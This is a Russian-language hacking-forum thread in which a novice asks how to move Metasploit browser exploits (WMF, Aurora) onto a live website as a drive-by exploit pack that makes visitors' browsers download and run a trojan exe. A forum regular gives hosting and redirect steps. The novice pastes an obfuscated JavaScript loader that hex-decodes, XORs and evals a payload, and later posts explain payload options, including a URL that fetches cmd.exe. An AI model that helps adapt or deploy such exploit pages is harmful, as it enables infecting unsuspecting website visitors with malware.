Вопрос по metasploit

[Начинающий]

Здравствуйте, подскажите пожалуйста один момент, хочу перенести сплойты с metasploit framework на сайт, в связку, на локалхосте все отлично прогружается, броузер пробивается и грузится/запускается екзе с www. Думал чтобы перенести сплойты на сайт достаточно будет достать сплойт с временной папки (tiff файл) вытащить его исходный код и вставить в html, но сделав это браузер уже не пробивается..
И srvhost ведь для этого случая необязателен и может быть 0.0.0.0 если адрес exe находится в payload?

[root]

Здраствуй)

Если я правильно понял, то тебе нужно:

1. Подготовить tiff файл.

>> Это вроде сделано.

2. Подготовить hmtl страницу.

>> Страницу делают не из tiff файла... За ходишь на сервер Metasploit"a и сохраняешь, ту, страницу у себя на ПК. Затем открой ее и исправь "редирект" "http://localhost/sploit.tiff" на "http://yousite.ru/sploit.tiff".

3. Положить на хостинг три файла (test.html, sploit.tiff, trojan.exe).

PS(На будущее): Для начала, нужно уточнить эксплойт(ы), с какими возникла проблема...

[Начинающий]

.........окно переставляю,tiff перестал появляться после сплойтинга xD

[root]

Заработало?

[Начинающий]

tiff даже после переустановки перестал появляться, хм, в общем также появляется 3 файла


Как я понял первый html файл и есть tiff? вот его код :

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var JVNKPOyIeMcWhNyAy = '
ВЫРЕЗАл';#######################
var aoQWmTGTtS = '';
for (i = 0;i<JVNKPOyIeMcWhNyAy.length;i+=2) {
aoQWmTGTtS += String.fromCharCode(parseInt(JVNKPOyIeMcWhNyAy.sub string(i, i+2), 16));
}
var QTQzpYIGkXrZWfKpwRtBQjpSXGLBX = location.search.substring(1);
var UHFqN = '';
for (i=0;i<aoQWmTGTtS.length;i++) {
UHFqN += String.fromCharCode(aoQWmTGTtS.charCodeAt(i) ^ QTQzpYIGkXrZWfKpwRtBQjpSXGLBX.charCodeAt(i%QTQzpYI GkXrZWfKpwRtBQjpSXGLBX.length));
}
window["eMIvMIaMIl".replace(/[A-Z]/g,"")](UHFqN);

</script>
</head>
<body>
<span id="tlUFJwiMvEQGEeZBAnZaFxCrvPSCgbhRHbzjwJstPF"><i frame src="/QoM93MqSOMPH0MrRUZjdxnYplxxeKdKApPzVNdJDCbdzxKScsa nywEQRtT.gif" onload="jWuyrRHLTXpcOuPoZDmMZxSfdQjTWMsoNkozxsKwLV yJfmrrADjthuR(event)" /></span></body></html>
</body>
</html>

[root]

По идее должно работать, но не работает... Только что сам испробовал - похоже там играет роль еще передаваемый параметр "GET", который идет после "?". Пока не знаю, попробую завтра еще...

[desp0s]

Есть такая штука как MSF-XB (эксплоит билдер), вот с помощью её открывай слоиты из msf и смотри исходники.

[Начинающий]

спасибо за совет, но не думаю что мне это поможет, меня интересуют сплойты с уже прикрученным шеллом, возможно же без знания asm,c и т.д переоборудовать любой(пригодный) готовый сплойт(с шеллом) фреймворка под сайт в связку.

В статье -=Lebed=- на античате про фрейворк при тестинге сплойта wmf у них открывается и запускается tiff файл при заходе браузером, а у меня с этим же сплойтом открывается и запускается окно с wmf файлом...

[root]

В статье -=Lebed=- на античате про фрейворк при тестинге сплойта wmf у них открывается и запускается tiff файл при заходе браузером, а у меня с этим же сплойтом открывается и запускается окно с wmf файлом...

Мда... Вы определитесь со сплойтом про который мы говорим! Про ie_xp_pfv_metafile.pm aka ms06_001_wmf_setabortpr или про ie_aurora aka ms10_002_aurora.

PS: В статье из АНИТИЧАТ"а Вас должен интересовать только wmf-файл, если вам не нравиться формат можете переименовать его как в tiff, так gif, jpg, ... - Windows все равно, что открывать - т.е. сплоит сработает...

спасибо за совет, но не думаю что мне это поможет, меня интересуют сплойты с уже прикрученным шеллом, возможно же без знания asm,c и т.д переоборудовать любой(пригодный) готовый сплойт(с шеллом) фреймворка под сайт в связку.

Рекомендую, не маяться фигней, а сходить купить книжек или на худой конец скачать - запастись терпением, желанием и сесть изучать гранит науки. Если данный совет не для Вас - купить связку сплоитов и не морочить нам голову.

[Начинающий]

Знаю связко писателей которые обходились и знаниями php&javascript... я просто кое что неуловил в этом моменте о котором спрашиваю
Конечно извините что морочу вам голову, удаляюсь..

[root]

Знаю связко писателей которые обходились и знаниями php&javascript... я просто кое что неуловил в этом моменте о котором спрашиваю
Конечно извините что морочу вам голову, удаляюсь..

Поясняю, не уясненное:

SRVHOST, SRVPORT - Адрес и порт сервера Metasploit. На сплоит данный параметр не влияет, поэтому можете его выставлять, а можете оставить дефолтным.
LHOST, LPORT - Используется в случаях Бекконекта. Ваш, Адрес & Порт.

Дополнительно: конкретно из примера, АНИТИЧАТ"а:

URIPATH - Указывается адрес размещения файла, например EXE. Вот "картинка" которая скачивает cmd.exe, по адресу http://forum.nrg-team.org/test/cmd.exe

Если Вы не можете разобраться с простейшими параметрами Metasploit"a, то о каких связках может быть идти речь?

Тема закрыта.

PS(Знаю связко писателей): Пример, с подобных людей, брать не стоит...